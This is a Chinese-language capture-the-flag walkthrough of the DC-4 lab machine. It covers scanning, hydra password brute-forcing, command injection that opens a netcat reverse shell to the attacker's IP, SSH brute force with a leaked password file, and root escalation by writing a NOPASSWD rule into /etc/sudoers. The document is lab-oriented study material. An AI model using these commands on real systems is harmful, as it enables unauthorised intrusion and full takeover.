靶机:DC-4

一、信息收集

1、主机发现

复制代码
nmap 192.168.236.0/24

2、端口扫描

复制代码
nmap 192.168.236.175 -p- -A

3、目录扫描

复制代码
dirb http://192.168.236.175

二、漏洞探测

访问80端口,发现登录页面

尝试爆破密码

复制代码
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.236.175 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F

http-post-form:指定使用 HTTP POST 请求方式。
"/login.php:username=^USER^&password=^PASS^:S=logout":指定登录页面地址 /login.php,并使用 username 和 password 作为参数名来传递用户名和密码。其中 ^USER^ 和 ^PASS^ 含义为在暴力破解过程之中将要用到的用户名和密码,而 :S=logout 则是指当程序返回值为 logout 时,认为破解成功并退出程序。
-F:如果成功的话,停止猜测其他密码。

登录

复制代码
admin:happy

bp抓包,是命令执行

查看 /etc/passwd 文件

三、GetShell

反弹shell

复制代码
radio=nc+-e/bin/bash+192.168.236.137+4444&submit=Run
nc -lvvp 4444

四、提权

切换为交互式shell

复制代码
python3 -c 'import pty;pty.spawn("/bin/bash")'

sudo -l 看一下,不知道密码

在 jim 用户下发现密码文件

下载到本地

复制代码
python3 -m http.server
wget http://192.168.236.175:8000/old-passwords.bak

使用 hydra 破解

复制代码
hydra -L users.txt -P old-passwords.bak ssh://192.168.236.175

jim:jibril04

ssh 连接

复制代码
ssh jim@192.168.236.175

在 /var/mail 下有一封信,发现 charles 用户的密码

复制代码
charles:^xHhA&hvim0y

切换用户

查看具有 root 权限的命令

复制代码
sudo -l

teehee是个小众的linux编辑器,执行以下命令,成功提权

复制代码
echo 'charles ALL=(ALL:ALL) NOPASSWD:ALL' | sudo teehee -a /etc/sudoers
sudo su

查看flag

相关推荐
玥轩_5211 分钟前
BUUCTF [WUSTCTF2020]spaceclub 1
安全·网络安全·ctf·buuctf·ascii·spaceclub·wustctf2020
ManageEngine卓豪20 分钟前
网络工具如何帮助消除网络安全风险
网络安全·网络管理·网络工具
码农12138号7 小时前
BUUCTF在线评测-练习场-WebCTF习题[GXYCTF2019]BabyUpload1-flag获取、解析
web安全·网络安全·文件上传漏洞·buuctf·解析漏洞
Johny_Zhao7 小时前
Docker + CentOS 部署 Zookeeper 集群 + Kubernetes Operator 自动化运维方案
linux·网络安全·docker·信息安全·zookeeper·kubernetes·云计算·系统运维
独行soc13 小时前
#渗透测试#批量漏洞挖掘#HSC Mailinspector 任意文件读取漏洞(CVE-2024-34470)
linux·科技·安全·网络安全·面试·渗透测试
Whoisshutiao15 小时前
网安-XSS-pikachu
前端·安全·网络安全
游戏开发爱好者81 天前
iOS重构期调试实战:架构升级中的性能与数据保障策略
websocket·网络协议·tcp/ip·http·网络安全·https·udp
安全系统学习1 天前
系统安全之大模型案例分析
前端·安全·web安全·网络安全·xss
A5rZ2 天前
Puppeteer 相关漏洞-- Google 2025 Sourceless
网络安全
Bruce_Liuxiaowei2 天前
常见高危端口风险分析与防护指南
网络·网络安全·端口·信息搜集